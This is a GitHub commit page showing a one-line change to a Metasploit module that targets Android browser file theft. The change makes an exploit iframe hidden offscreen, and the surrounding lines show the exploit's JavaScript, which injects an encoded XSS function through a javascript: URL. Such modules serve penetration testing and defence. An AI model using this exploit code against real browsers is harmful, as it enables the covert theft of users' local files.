We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 3c5d7b3 commit 7db3277Copy full SHA for 7db3277
modules/auxiliary/gather/android_browser_file_theft.rb
@@ -164,7 +164,7 @@ def exploit_js
164
165
var brokenFrame = document.createElement('iframe');
166
brokenFrame.src = 'http://localhost:100';
167
- //brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;')
+ brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;')
168
brokenFrame.onload = function() {
169
brokenFrame.onload = null;
170
document.documentURI = 'javascript://hostname.com/%0D%0A('+encodeURIComponent(xss.toString())+')()';
0 commit comments